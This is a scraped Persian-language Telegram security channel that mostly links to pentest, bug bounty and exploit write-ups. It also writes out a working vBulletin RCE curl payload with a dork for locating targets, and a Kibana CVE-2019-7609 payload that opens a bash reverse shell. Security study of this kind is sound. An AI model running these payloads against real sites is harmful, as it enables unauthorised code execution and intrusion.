نفوذ به مرسدس بنز و در دست گرفتن کنترل آن در کنفرانس بلک هت ۲۰۲۰
https://i.blackhat.com/USA-20/Thursday/us-20-Yan-Security-Research-On-Mercedes-Benz-From-Hardware-To-Car-Control.pdf
#iot #blackhat
#pentest
@sec_nerd
https://i.blackhat.com/USA-20/Thursday/us-20-Yan-Security-Research-On-Mercedes-Benz-From-Hardware-To-Car-Control.pdf
#iot #blackhat
#pentest
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
Exploiting Android Messengers with WebRTC: CVE-2020-6514 - CVE-2020-6831 - CVE-2020-6389 - CVE-2020-6387.
Part 1 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-1.html
Part 2 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-2.html
Part 3 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-3.html
#android
#webrtc
@sec_nerd
Part 1 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-1.html
Part 2 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-2.html
Part 3 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-3.html
#android
#webrtc
@sec_nerd
0day RCE exploit on vBulletin 5xx
dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#vbulletin
#rce
#pentest
#web
@sec_nerd
dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#vbulletin
#rce
#pentest
#web
@sec_nerd
یکی از کارکنان شرکت SANS هک شد!
ایمیل این کارمند سنز با حمله ی فیشینگ توسط یک هکر ناشناس مورد نفوذ قرار گرفت و برخی قوانین فوروارد به آن اضافه شد که منجر به لو رفتن برخی اطلاعات غیرحساس گردید.
این اطلاعات شامل ۲۸ هزار آدرس ایمیل و عنوان شغلی، کشور محل زندگی و .. از کارکنان سنز می باشد.
شرکت SANS یک شرکت شناخته شده در عرصه آموزش امنیت سایبری میباشد.
https://www.sans.org/dataincident2020
#sans
#breach #news
@sec_nerd
ایمیل این کارمند سنز با حمله ی فیشینگ توسط یک هکر ناشناس مورد نفوذ قرار گرفت و برخی قوانین فوروارد به آن اضافه شد که منجر به لو رفتن برخی اطلاعات غیرحساس گردید.
این اطلاعات شامل ۲۸ هزار آدرس ایمیل و عنوان شغلی، کشور محل زندگی و .. از کارکنان سنز می باشد.
شرکت SANS یک شرکت شناخته شده در عرصه آموزش امنیت سایبری میباشد.
https://www.sans.org/dataincident2020
#sans
#breach #news
@sec_nerd
www.sans.org
SANS Institute
Computer security training, certification and free resources. We specialize in computer/network security, digital forensics, application security and IT audit.
CVE-2019-7609(kibana RCE) on right way by python2 scripts
- URI
/api/timelion/run
-Payload
{"sheet":[".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"if [ ! -f /tmp/%s ];then touch /tmp/%s && /bin/bash -c \\'/bin/bash -i >
https://github.com/kisec/CVE-2019-7609
#kibana
#rce
@sec_nerd
- URI
/api/timelion/run
-Payload
{"sheet":[".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"if [ ! -f /tmp/%s ];then touch /tmp/%s && /bin/bash -c \\'/bin/bash -i >
https://github.com/kisec/CVE-2019-7609
#kibana
#rce
@sec_nerd
همه چیز در خصوص SSRF
https://medium.com/swlh/intro-to-ssrf-beb35857771f
https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437
https://medium.com/swlh/ssrf-in-the-wild-e2c598900434
https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
#ssrf
#bugbounty
#pentest
#web
@sec_nerd
https://medium.com/swlh/intro-to-ssrf-beb35857771f
https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437
https://medium.com/swlh/ssrf-in-the-wild-e2c598900434
https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
#ssrf
#bugbounty
#pentest
#web
@sec_nerd
Medium
Intro to SSRF
And how your firewall failed you.
لیست جامعی از رایت آپ های کشف باگ در وبسایتهای بزرگ
از سال ۲۰۱۲ تا ۲۰۲۰
https://pentester.land/list-of-bug-bounty-writeups.html
#pentest
#bugbounty
@sec_nerd
از سال ۲۰۱۲ تا ۲۰۲۰
https://pentester.land/list-of-bug-bounty-writeups.html
#pentest
#bugbounty
@sec_nerd
https://www.zixem.altervista.org/SQLi/
https://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4
چند چالش sql injection به همراه راه حل
#sqli #web #pentest
@sec_nerd
https://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4
چند چالش sql injection به همراه راه حل
#sqli #web #pentest
@sec_nerd
Medium
Union SQLi Challenges (Zixem Write-up)
I’ve always avoided learning more about SQL Injections, since they’ve always seemed like quite a daunting part of Infosec. Because of this…
دور زدن آنتی ویروس با استفاده از لودر 64 بیتی متاسپلویت
https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
#msf
#windows
#pentest
@sec_nerd
https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
#msf
#windows
#pentest
@sec_nerd
اجرای دستور از راه دور بر روی Pulse secure ssl vpn
CVE-2020-8218
https://github.com/withdk/pulse-gosecure-rce-poc/blob/master/pulse-gosecure-rce.py
#rce
#pulse
#network
@sec_nerd
CVE-2020-8218
https://github.com/withdk/pulse-gosecure-rce-poc/blob/master/pulse-gosecure-rce.py
#rce
#pulse
#network
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
اینجا یاد میگیرید چطور FUFF و burpsuite رو با هم ترکیب کنید
https://medium.com/@santosomar/a-quick-guide-to-using-ffuf-with-burp-suite-713492f62242
#fuff
#fuzz
#burpsuite
@sec_nerd
https://medium.com/@santosomar/a-quick-guide-to-using-ffuf-with-burp-suite-713492f62242
#fuff
#fuzz
#burpsuite
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
آپدیت جدید برپ سوییت
نمایش ساید بای ساید درخواست و پاسخ در بخش هیستوری
https://portswigger.net/burp/releases/professional-community-2020-9
#burpsuite
@sec_nerd
نمایش ساید بای ساید درخواست و پاسخ در بخش هیستوری
https://portswigger.net/burp/releases/professional-community-2020-9
#burpsuite
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
کشف آسیب پذیری RCE در پیام رسان cisco jabber
https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/
این مطلب رو بخونید تا ببینید چطور یک آسیب پذیری XSS به اجرای دستور ختم میشه
#rce
#cisco
#xss
@sec_nerd
https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/
این مطلب رو بخونید تا ببینید چطور یک آسیب پذیری XSS به اجرای دستور ختم میشه
#rce
#cisco
#xss
@sec_nerd
نکات کاربردی در خصوص حملات IDOR
https://www.notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
#idor
#bugbounty
#web
@sec_nerd
https://www.notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
#idor
#bugbounty
#web
@sec_nerd
rural-tune-378 on Notion
IDOR: Attack vectors, exploitation, bypasses and chains | Notion
API12019: Testing for IDOR/Broken object level authorization:
کشف باگ XSS در google maps و دریافت جایزه ی ۱۰ هزار دلاری
https://www.ehpus.com/post/xss-fix-bypass-10000-bounty-in-google-maps
#bugbounty
#google
#xss
@sec_nerd
https://www.ehpus.com/post/xss-fix-bypass-10000-bounty-in-google-maps
#bugbounty
#xss
@sec_nerd
کشف دوباره آسیب پذیری RCE بر روی یکی از سرویس های فیسبوک توسط Orange Tsai
https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
لینک ویدیو:
https://www.youtube.com/watch?v=hGTLIIOb14A
#facebook
#Bugbounty
#rce
@sec_nerd
https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
لینک ویدیو:
https://www.youtube.com/watch?v=hGTLIIOb14A
#Bugbounty
#rce
@sec_nerd